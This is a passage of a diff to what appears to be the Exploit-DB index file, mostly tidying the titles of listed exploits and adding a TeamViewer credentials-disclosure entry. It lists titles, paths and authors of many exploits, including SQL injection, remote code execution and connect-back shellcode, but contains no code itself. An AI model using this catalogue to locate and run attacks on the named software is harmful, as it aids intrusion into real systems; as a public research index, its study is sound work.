Flash Player 10.1.51 - Local File Access Information Disclosure",2010-03-03,"lis cker",multiple,remote,0 -33690,platforms/php/webapps/33690.txt,"DosyaYukle Scripti 1.0 - Remote File Upload",2010-03-03,indoushka,php,webapps,0 +33690,platforms/php/webapps/33690.txt,"DosyaYukle Scripti 1.0 - Arbitrary File Upload",2010-03-03,indoushka,php,webapps,0 33691,platforms/jsp/webapps/33691.txt,"Comptel Provisioning and Activation - 'error_msg_parameter' Cross-Site Scripting",2010-03-04,thebluegenius,jsp,webapps,0 33707,platforms/windows/dos/33707.txt,"Orb Networks 2.54.18 - Orb Direct Show Filter MP3 File Divide-by-Zero Denial of Service",2010-03-04,"Matthew Bergin",windows,dos,0 -33708,platforms/bsd/dos/33708.c,"FreeBSD 8.0 and OpenBSD 4.x - 'ftpd' NULL Pointer Dereference Denial Of Service",2010-03-05,kingcope,bsd,dos,0 +33708,platforms/bsd/dos/33708.c,"FreeBSD 8.0 / OpenBSD 4.x - 'ftpd' Null Pointer Dereference Denial Of Service",2010-03-05,kingcope,bsd,dos,0 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0 33706,platforms/php/webapps/33706.txt,"Drupal < 6.16 / 5.22 - Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0 33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 - 'ShowPost.asp' Cross-Site Scripting",2010-03-04,Liscker,asp,webapps,0 @@ -30407,6 +30412,7 @@ id,file,description,date,author,platform,type,port 33751,platforms/php/webapps/33751.txt,"CodeIgniter 1.0 - 'BASEPATH' Multiple Remote File Inclusion",2010-03-11,eidelweiss,php,webapps,0 33752,platforms/linux/remote/33752.html,"WebKit 1.2.x - Right-to-Left Displayed Text Handling Memory Corruption",2010-03-11,wushi,linux,remote,0 33753,platforms/php/webapps/33753.txt,"Easynet4u Forum Host - 'topic.php' SQL Injection",2010-03-12,Pr0T3cT10n,php,webapps,0 +40342,platforms/windows/local/40342.py,"TeamViewer 11.0.65452 (64 bit) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",windows,local,0 33754,platforms/php/webapps/33754.txt,"pMyAdmin 3.3.5.1 - 'db_create.php' Cross-Site Scripting",2010-03-12,Liscker,php,webapps,0 33755,platforms/php/dos/33755.php,"PHP 5.3.2 xmlrpc Extension - Multiple Remote Denial of Service Vulnerabilities",2010-03-12,"Auke van Slooten",php,dos,0 33756,platforms/php/webapps/33756.txt,"Joomla! 'com_seek' Component - 'id' Parameter SQL Injection",2010-03-13,"DevilZ TM",php,webapps,0 @@ -30496,7 +30502,7 @@ id,file,description,date,author,platform,type,port 33847,platforms/multiple/remote/33847.txt,"netkar-PRO 1.1 - Remote Stack Buffer Overflow",2010-04-13,"Luigi Auriemma",multiple,remote,0 33848,platforms/windows/remote/33848.py,"WinMount 3.3.401 - '.zip' Remote Buffer Overflow",2010-04-19,lilf,windows,remote,0 33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST Parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0 -33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation NULL Pointer Denial Of Service",2014-06-13,"A reliable source",windows,dos,0 +33849,platforms/windows/dos/33849.txt,"netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial Of Service",2014-06-13,"A reliable source",windows,dos,0 33850,platforms/linux/dos/33850.txt,"memcached 1.4.2 - Memory Consumption Remote Denial of Service",2010-04-27,fallenpegasus,linux,dos,0 33851,platforms/php/webapps/33851.txt,"WordPress TimThumb 2.8.13 WebShot Plugin/Theme - Remote Code Execution",2014-06-24,@u0x,php,webapps,0 33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure",2010-04-22,"Veerendra G.G",multiple,remote,0 @@ -30510,12 +30516,12 @@ id,file,description,date,author,platform,type,port 34144,platforms/php/webapps/34144.txt,"Joomla! 'com_easygb' Component - 'Itemid' Parameter Cross-Site Scripting",2010-06-08,"L0rd CrusAd3r",php,webapps,0 34145,platforms/unix/dos/34145.txt,"Python 3.2 - 'audioop' Module Memory Corruption",2010-06-14,haypo,unix,dos,0 34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login - Multiple SQL Injections",2010-06-15,"L0rd CrusAd3r",php,webapps,0 -34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 - 'username' Parameter Cross-Site Scripting",2010-06-06,"Adam Baldwin",php,webapps,0 +34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 - ''Username'' Parameter Cross-Site Scripting",2010-06-06,"Adam Baldwin",php,webapps,0 33862,platforms/hardware/remote/33862.rb,"D-Link - Authentication.cgi Buffer Overflow",2014-06-24,Metasploit,hardware,remote,80 33863,platforms/hardware/remote/33863.rb,"D-Link - hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,Metasploit,hardware,remote,80 33865,platforms/linux/remote/33865.rb,"Alienvault OSSIM - av-centerd Command Injection",2014-06-24,Metasploit,linux,remote,40007 33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password Cross-Site Request Forgery",2014-06-25,nopesled,hardware,webapps,0 -33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0 +33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution",2014-06-25,LiquidWorm,php,webapps,0 34142,platforms/php/webapps/34142.txt,"MODx 1.0.3 - 'index.php' Multiple SQL Injection",2010-06-14,"High-Tech Bridge SA",php,webapps,0 33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure",2010-04-22,hkm,hardware,remote,0 33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 - 'id' Parameter Cross-Site Scripting",2010-04-22,Valentin,php,webapps,0 @@ -30549,12 +30555,12 @@ id,file,description,date,author,platform,type,port 33900,platforms/windows/remote/33900.pl,"Serenity Audio Player 3.2.3 - '.m3u' Buffer Overflow",2010-04-26,Madjix,windows,remote,0 33901,platforms/windows/remote/33901.rb,"Serenity Audio Player 3.2.3 - '.m3u' Buffer Overflow (Metasploit)",2010-04-26,blake,windows,remote,0 34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80 -33904,platforms/linux/local/33904.txt,"check_dhcp 2.0.2 (Nagios Plugins) - Arbitrary Option File Read Race Condition Exploit",2014-06-28,"Dawid Golunski",linux,local,0 +33904,platforms/linux/local/33904.txt,"check_dhcp 2.0.2 (Nagios Plugins) - Arbitrary Option File Read Race Condition",2014-06-28,"Dawid Golunski",linux,local,0 33905,platforms/multiple/remote/33905.txt,"Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scripting",2010-04-28,"arun kethipelly",multiple,remote,0 33906,platforms/php/webapps/33906.txt,"velBox 1.2 - Insecure Cookie Authentication Bypass",2010-04-28,indoushka,php,webapps,0 33907,platforms/multiple/remote/33907.txt,"ZKSoftware 'ZK5000' - Remote Information Disclosure",2010-03-20,fb1h2s,multiple,remote,0 33908,platforms/php/webapps/33908.txt,"Your Articles Directory - Login Option SQL Injection",2010-04-29,Sid3^effects,php,webapps,0 -33909,platforms/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 - 'username' Parameter SQL Injection",2010-04-28,"John Leitch",php,webapps,0 +33909,platforms/php/webapps/33909.txt,"Tele Data's Contact Management Server 0.9 - ''Username'' Parameter SQL Injection",2010-04-28,"John Leitch",php,webapps,0 33960,platforms/php/webapps/33960.txt,"ECShop 2.7.2 - 'category.php' SQL Injection",2010-05-07,Liscker,php,webapps,0 33961,platforms/windows/local/33961.txt,"Ubisoft Uplay 4.6 - Insecure File Permissions Privilege Escalation",2014-07-03,LiquidWorm,windows,local,0 33962,platforms/hardware/remote/33962.txt,"Cisco Application Control Engine (ACE) - HTTP Parsing Security",2010-05-07,"Alexis Tremblay",hardware,remote,0 @@ -30621,7 +30627,7 @@ id,file,description,date,author,platform,type,port 33982,platforms/php/webapps/33982.txt,"NPDS REvolution 10.02 - 'download.php' SQL Injection",2010-05-13,"High-Tech Bridge SA",php,webapps,0 33983,platforms/php/webapps/33983.txt,"Frog CMS 0.9.5 - Arbitrary File Upload",2014-07-06,"Javid Hussain",php,webapps,0 33985,platforms/php/webapps/33985.txt,"NPDS REvolution 10.02 - 'topic' Parameter Cross-Site Scripting",2010-05-13,"High-Tech Bridge SA",php,webapps,0 -33986,platforms/php/webapps/33986.txt,"PHP File Uploader - Remote File Upload",2010-01-03,indoushka,php,webapps,0 +33986,platforms/php/webapps/33986.txt,"PHP File Uploader - Arbitrary File Upload",2010-01-03,indoushka,php,webapps,0 33987,platforms/php/webapps/33987.txt,"PHP Banner Exchange 1.2 - 'signupconfirm.php' Cross-Site Scripting",2010-01-03,indoushka,php,webapps,0 34112,platforms/windows/local/34112.txt,"Microsoft Windows XP SP3 - MQAC.sys Arbitrary Write Privilege Escalation",2014-07-19,KoreLogic,windows,local,0 33990,platforms/multiple/remote/33990.rb,"Gitlist - Unauthenticated Remote Command Execution",2014-07-07,Metasploit,multiple,remote,80 @@ -30630,7 +30636,7 @@ id,file,description,date,author,platform,type,port 33993,platforms/php/webapps/33993.txt,"Planet Script 1.x - 'idomains.php' Cross-Site Scripting",2010-05-14,Mr.ThieF,php,webapps,0 33994,platforms/php/webapps/33994.txt,"PonVFTP - Insecure Cookie Authentication Bypass",2010-05-17,SkuLL-HackeR,php,webapps,0 33995,platforms/multiple/webapps/33995.txt,"Blaze Apps 1.x - SQL Injection / HTML Injection",2010-01-19,"AmnPardaz Security Research Team",multiple,webapps,0 -33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - File Include",2014-07-07,Vulnerability-Lab,ios,webapps,0 +33996,platforms/ios/webapps/33996.txt,"Photo Org WonderApplications 8.3 iOS - File Inclusion",2014-07-07,Vulnerability-Lab,ios,webapps,0 33999,platforms/php/webapps/33999.txt,"Mobile Chat 2.0.2 - 'chatsmileys.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 34000,platforms/multiple/webapps/34000.txt,"Serialsystem 1.0.4 Beta - 'list' Parameter Cross-Site Scripting",2010-01-18,indoushka,multiple,webapps,0 34001,platforms/linux/local/34001.c,"Linux Kernel 2.6.x - Btrfs Cloned File Security Bypass",2010-05-18,"Dan Rosenberg",linux,local,0 @@ -30736,8 +30742,8 @@ id,file,description,date,author,platform,type,port 34116,platforms/php/webapps/34116.txt,"Bits Video Script 2.05 Gold Beta - showcasesearch.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 34117,platforms/php/webapps/34117.txt,"Bits Video Script 2.05 Gold Beta - showcase2search.php rowptem[template] Parameter Remote File Inclusion",2010-01-18,indoushka,php,webapps,0 34118,platforms/php/webapps/34118.txt,"Hitmaaan Gallery 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,php,webapps,0 -34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - addvideo.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 -34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 - register.php File Upload Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 +34119,platforms/php/webapps/34119.txt,"Bits Video Script 2.04/2.05 - 'addvideo.php' File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 +34120,platforms/php/webapps/34120.txt,"Bits Video Script 2.04/2.05 - 'register.php' File Upload / Arbitrary PHP Code Execution",2010-01-18,indoushka,php,webapps,0 34121,platforms/php/webapps/34121.txt,"Bits Video Script 2.04/2.05 - 'search.php' Cross-Site Scripting",2010-01-18,indoushka,php,webapps,0 34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service",2010-07-15,"Luigi Auriemma",multiple,dos,0 34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 - SQL Injection / HTML Injection",2009-09-21,learn3r,php,webapps,0 @@ -30775,7 +30781,7 @@ id,file,description,date,author,platform,type,port 34162,platforms/windows/dos/34162.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-07-24,"Gabor Seljan",windows,dos,0 34163,platforms/hardware/webapps/34163.txt,"Lian Li NAS - Multiple Vulnerabilities",2014-07-24,pws,hardware,webapps,0 34164,platforms/linux/dos/34164.pl,"Make 3.81 - Heap Overflow (PoC)",2014-07-24,HyP,linux,dos,0 -34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (64-bit) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",multiple,webapps,0 +34165,platforms/multiple/webapps/34165.txt,"Zenoss Monitoring System 4.2.5-2108 (x64) - Persistent Cross-Site Scripting",2014-07-25,"Dolev Farhi",multiple,webapps,0 34166,platforms/php/webapps/34166.txt,"KubeSupport - 'lang' Parameter SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 34167,platforms/win_x86/local/34167.rb,"MQAC.sys - Arbitrary Write Privilege Escalation",2014-07-25,Metasploit,win_x86,local,0 34168,platforms/php/webapps/34168.py,"Pligg 2.0.1 - Multiple Vulnerabilities",2014-07-25,BlackHawk,php,webapps,80 @@ -30814,7 +30820,7 @@ id,file,description,date,author,platform,type,port 34206,platforms/hardware/webapps/34206.txt,"D-Link AP 3200 - Multiple Vulnerabilities",2014-07-30,pws,hardware,webapps,80 34207,platforms/php/webapps/34207.txt,"Customer Paradigm PageDirector - 'id' Parameter SQL Injection",2010-06-28,Tr0y-x,php,webapps,0 34208,platforms/hardware/remote/34208.txt,"D-Link DAP-1160 Wireless Access Point - DCC Protocol Security Bypass",2010-06-28,"Cristofaro Mune",hardware,remote,0 -34209,platforms/php/webapps/34209.txt,"BlaherTech Placeto CMS - 'Username' Parameter SQL Injection",2010-06-28,S.W.T,php,webapps,0 +34209,platforms/php/webapps/34209.txt,"BlaherTech Placeto CMS - ''Username'' Parameter SQL Injection",2010-06-28,S.W.T,php,webapps,0 34210,platforms/php/webapps/34210.txt,"OneCMS 2.6.1 - admin/admin.php cat Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 34211,platforms/php/webapps/34211.html,"OneCMS 2.6.1 - search.php search Parameter SQL Injection",2010-06-24,"High-Tech Bridge SA",php,webapps,0 34212,platforms/php/webapps/34212.html,"OneCMS 2.6.1 - admin/admin.php Short1 Parameter Cross-Site Scripting",2010-06-24,"High-Tech Bridge SA",php,webapps,0 @@ -30909,7 +30915,7 @@ id,file,description,date,author,platform,type,port 34300,platforms/php/webapps/34300.py,"CMS Made Simple Antz Toolkit 1.02 Module - Arbitrary File Upload",2010-07-11,"John Leitch",php,webapps,0 34301,platforms/multiple/remote/34301.txt,"Asterisk Recording Interface 0.7.15/0.10 - Multiple Vulnerabilities",2010-07-12,TurboBorland,multiple,remote,0 34302,platforms/php/webapps/34302.txt,"Diem 5.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-13,"High-Tech Bridge SA",php,webapps,0 -34303,platforms/ios/webapps/34303.txt,"PhotoSync Wifi & Bluetooth 1.0 - File Include",2014-08-09,Vulnerability-Lab,ios,webapps,8000 +34303,platforms/ios/webapps/34303.txt,"PhotoSync Wifi & Bluetooth 1.0 - File Inclusion",2014-08-09,Vulnerability-Lab,ios,webapps,8000 34305,platforms/ios/webapps/34305.txt,"Easy FTP Pro 4.2 iOS - Command Injection",2014-08-09,Vulnerability-Lab,ios,webapps,8080 34306,platforms/hardware/dos/34306.txt,"SHARP MX Series - Denial of Service",2014-08-09,pws,hardware,dos,23 34307,platforms/hardware/dos/34307.txt,"Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm",2014-08-09,"Matt O'Connor",hardware,dos,0 @@ -30935,7 +30941,7 @@ id,file,description,date,author,platform,type,port 34334,platforms/win_x86-64/remote/34334.rb,"VirtualBox - 3D Acceleration Virtual Machine Escape",2014-08-14,Metasploit,win_x86-64,remote,0 34333,platforms/windows/local/34333.rb,"VirtualBox Guest Additions - VBoxGuest.sys Privilege Escalation",2014-08-13,Metasploit,windows,local,0 34331,platforms/windows/local/34331.py,"BlazeDVD Pro 7.0 - '.plf' Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0 -34343,platforms/asp/webapps/34343.txt,"MOJO IWms 7 - 'default.asp' Cookie manipulation",2007-12-17,"cp77fk4r ",asp,webapps,0 +34343,platforms/asp/webapps/34343.txt,"MOJO IWms 7 - 'default.asp' Cookie Manipulation",2007-12-17,"cp77fk4r ",asp,webapps,0 34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET - Multiple SQL Injections",2009-12-17,bi0,asp,webapps,0 34345,platforms/java/webapps/34345.txt,"jCore - 'search' Parameter Cross-Site Scripting",2009-12-17,loneferret,java,webapps,0 34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate - Arbitrary File Upload",2014-09-09,Metasploit,windows,remote,8020 @@ -31042,13 +31048,13 @@ id,file,description,date,author,platform,type,port 34453,platforms/php/webapps/34453.txt,"PaoBacheca 2.1 - 'index.php' URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 34454,platforms/php/webapps/34454.txt,"PaoBacheca 2.1 - scrivi.php URI Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 34455,platforms/php/webapps/34455.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injection",2010-08-12,Affix,php,webapps,0 -34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - NULL Pointer Dereference Denial Of Service",2009-08-14,"Luigi Auriemma",multiple,dos,0 +34457,platforms/multiple/dos/34457.txt,"Sniper Elite 1.0 - Null Pointer Dereference Denial Of Service",2009-08-14,"Luigi Auriemma",multiple,dos,0 34458,platforms/windows/dos/34458.html,"Microsoft Internet Explorer - Memory Corruption PoC (MS14-029)",2014-08-28,PhysicalDrive0,windows,dos,0 34459,platforms/php/webapps/34459.txt,"Amiro.CMS 5.4 - Multiple Input Validation Vulnerabilities",2009-10-19,"Vladimir Vorontsov",php,webapps,0 34460,platforms/windows/dos/34460.py,"Sonique 2.0 - '.xpl' Remote Stack Based Buffer Overflow",2010-08-12,"Hamza_hack_dz & Black-liondz1",windows,dos,0 34461,platforms/multiple/remote/34461.py,"NRPE 2.15 - Remote Code Execution",2014-08-29,"Claudio Viviani",multiple,remote,0 34462,platforms/windows/remote/34462.txt,"Microsoft Windows Kerberos - 'Pass The Ticket' Replay Security Bypass",2010-08-13,"Emmanuel Bouillon",windows,remote,0 -34463,platforms/windows/dos/34463.py,"HTML Help Workshop 1.4 - (SEH) Buffer Overflow",2014-08-29,"Moroccan Kingdom (MKD)",windows,dos,0 +34463,platforms/windows/dos/34463.py,"HTML Help Workshop 1.4 - Buffer Overflow (SEH)",2014-08-29,"Moroccan Kingdom (MKD)",windows,dos,0 34464,platforms/php/webapps/34464.txt,"SyntaxCMS - 'rows_per_page' Parameter SQL Injection",2010-08-10,"High-Tech Bridge SA",php,webapps,0 34467,platforms/php/webapps/34467.txt,"Edit-X PHP CMS - 'search_text' Parameter Cross-Site Scripting",2010-08-13,"High-Tech Bridge SA",php,webapps,0 34468,platforms/php/webapps/34468.html,"Mystic 0.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 @@ -31089,7 +31095,7 @@ id,file,description,date,author,platform,type,port 34508,platforms/php/webapps/34508.txt,"AneCMS 1.0/1.3 - 'register/next' SQL Injection",2010-08-23,Sweet,php,webapps,0 34510,platforms/linux/dos/34510.txt,"OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial Of Service",2010-08-20,"Elena Stepanova",linux,dos,0 34511,platforms/php/webapps/34511.txt,"Mulitple WordPress Themes - 'admin-ajax.php img Parameter' Arbitrary File Download",2014-09-01,"Hugo Santiago",php,webapps,80 -34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling SEH Buffer Overflow",2014-09-01,k3170makan,windows,local,0 +34512,platforms/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling Buffer Overflow (SEH)",2014-09-01,k3170makan,windows,local,0 34513,platforms/multiple/webapps/34513.txt,"Arachni Web Application Scanner Web UI - Persistent Cross-Site Scripting",2014-09-01,"Prakhar Prasad",multiple,webapps,0 34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Arbitrary File Upload",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80 34517,platforms/windows/remote/34517.rb,"Wing FTP Server - Authenticated Command Execution",2014-09-01,Metasploit,windows,remote,5466 @@ -31114,7 +31120,7 @@ id,file,description,date,author,platform,type,port 34537,platforms/linux/local/34537.txt,"EncFS 1.6.0 - Flawed CBC/CFB Cryptography Implementation Weaknesses",2010-08-26,"Micha Riser",linux,local,0 34538,platforms/php/webapps/34538.txt,"WordPress Plugins Premium Gallery Manager - Unauthenticated Configuration Access",2014-09-05,Hannaichi,php,webapps,80 34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Persistent Cross-Site Scripting",2014-09-05,"Fikri Fadzil",php,webapps,80 -34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit (Python)",2014-09-05,"Robert Kugler",windows,dos,0 +34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Python)",2014-09-05,"Robert Kugler",windows,dos,0 34541,platforms/php/webapps/34541.txt,"WebsiteKit Gbplus - Name and Body Fields HTML Injection Vulnerabilities",2010-08-29,MiND,php,webapps,0 34542,platforms/windows/remote/34542.c,"UltraVNC 1.0.8.2 - DLL Loading Arbitrary Code Execution",2010-08-30,"Ivan Markovic",windows,remote,0 34543,platforms/php/webapps/34543.txt,"HP Insight Diagnostics Online Edition 8.4 - Parameters.php device Parameter Cross-Site Scripting",2010-08-31,"Mr Teatime",php,webapps,0 @@ -31223,7 +31229,7 @@ id,file,description,date,author,platform,type,port 34661,platforms/php/webapps/34661.txt,"x10 MP3 Automatic Search Engine 1.6.5b - info.php name Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34662,platforms/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b - lyrics.php id Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b - adult/video_listing.php key Parameter Cross-Site Scripting",2009-08-29,Moudi,php,webapps,0 -34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution / File Include",2014-09-15,Vulnerability-Lab,ios,webapps,0 +34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution / File Inclusion",2014-09-15,Vulnerability-Lab,ios,webapps,0 34666,platforms/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Root Code Execution",2014-09-15,eF,php,webapps,80 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",windows,remote,80 @@ -31308,7 +31314,7 @@ id,file,description,date,author,platform,type,port 34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script - 'addlink.php' SQL Injection",2009-07-21,Moudi,php,webapps,0 34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 34752,platforms/windows/dos/34752.c,"WS10 Data Server - SCADA Exploit Overflow (PoC)",2014-09-24,"Pedro Sánchez",windows,dos,0 -34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret - Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80 +34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret - Database Disclosure",2014-09-24,ZoRLu,asp,webapps,80 34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple Vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80 34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80 34756,platforms/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 - Command Injection",2014-09-24,Metasploit,windows,remote,3000 @@ -31352,8 +31358,8 @@ id,file,description,date,author,platform,type,port 34797,platforms/php/webapps/34797.txt,"Surgemail SurgeWeb 4.3e - Cross-Site Scripting",2010-10-04,"Kerem Kocaer",php,webapps,0 34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 - 'car' Parameter SQL Injection",2010-09-27,RoAd_KiLlEr,php,webapps,0 34781,platforms/php/webapps/34781.txt,"WordPress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80 -34798,platforms/php/webapps/34798.txt,"ITS SCADA Username - SQL Injection",2010-10-04,"Eugene Salov",php,webapps,0 -34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include",2014-09-29,Vulnerability-Lab,ios,webapps,0 +34798,platforms/php/webapps/34798.txt,"ITS SCADA 'Username' - SQL Injection",2010-10-04,"Eugene Salov",php,webapps,0 +34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Inclusion",2014-09-29,Vulnerability-Lab,ios,webapps,0 34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0 34802,platforms/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software 4.7.1 - Cross Domain Information Disclosure",2010-10-04,"599eme Man",hardware,remote,0 34809,platforms/php/webapps/34809.txt,"Tausch Ticket Script 3 - suchauftraege_user.php userid Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0 @@ -31461,7 +31467,7 @@ id,file,description,date,author,platform,type,port 34919,platforms/php/webapps/34919.txt,"Skybluecanvas 1.1 r237 - 'admin.php' Directory Traversal",2009-07-16,MaXe,php,webapps,0 34920,platforms/asp/webapps/34920.txt,"HttpCombiner ASP.NET - Remote File Disclosure",2014-10-07,"Le Ngoc Son",asp,webapps,0 34921,platforms/windows/local/34921.pl,"Asx to Mp3 2.7.5 - Stack Overflow",2014-10-07,"Amir Tavakolian",windows,local,0 -34925,platforms/php/remote/34925.rb,"WordPress InfusionSoft Plugin - Upload",2014-10-09,Metasploit,php,remote,80 +34925,platforms/php/remote/34925.rb,"WordPress InfusionSoft Plugin - Arbitrary File Upload",2014-10-09,Metasploit,php,remote,80 34926,platforms/windows/remote/34926.rb,"Rejetto HttpFileServer - Remote Command Execution",2014-10-09,Metasploit,windows,remote,80 34927,platforms/unix/remote/34927.rb,"F5 iControl - Remote Root Command Execution",2014-10-09,Metasploit,unix,remote,443 34928,platforms/jsp/webapps/34928.txt,"DrayTek VigorACS SI 1.3.0 - Multiple Vulnerabilities",2014-10-09,"Digital Misfits",jsp,webapps,0 @@ -31628,7 +31634,7 @@ id,file,description,date,author,platform,type,port 35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80 35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80 35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80 -35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,Metasploit,windows,local,0 +35101,platforms/windows/local/35101.rb,"Microsoft Windows - TrackPopupMenu Win32k Null Pointer Dereference",2014-10-28,Metasploit,windows,local,0 35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Pre-Authentication Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80 35214,platforms/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQL Injection",2014-11-11,"Anastasios Monachos",multiple,webapps,0 35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass",2014-10-29,gamehacker,hardware,remote,0 @@ -31656,9 +31662,9 @@ id,file,description,date,author,platform,type,port 35125,platforms/php/webapps/35125.txt,"OpenFiler - 'device' Parameter Cross-Site Scripting",2010-12-21,db.pub.mail,php,webapps,0 35126,platforms/php/webapps/35126.txt,"Habari 0.6.5 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 35128,platforms/hardware/webapps/35128.txt,"ZTE Modem ZXDSL 531BIIV7.3.0f_D09_IN - Persistent Cross-Site Scripting",2014-10-31,"Ravi Rajput",hardware,webapps,0 -35129,platforms/php/webapps/35129.txt,"Who's Who Script - Cross-Site Request Forgery Exploit (Add Admin Account)",2014-10-31,"ZoRLu Bugrahan",php,webapps,0 +35129,platforms/php/webapps/35129.txt,"Who's Who Script - Cross-Site Request Forgery (Add Admin Account)",2014-10-31,"ZoRLu Bugrahan",php,webapps,0 35130,platforms/windows/remote/35130.txt,"Calibre 0.7.34 - Cross-Site Scripting / Directory 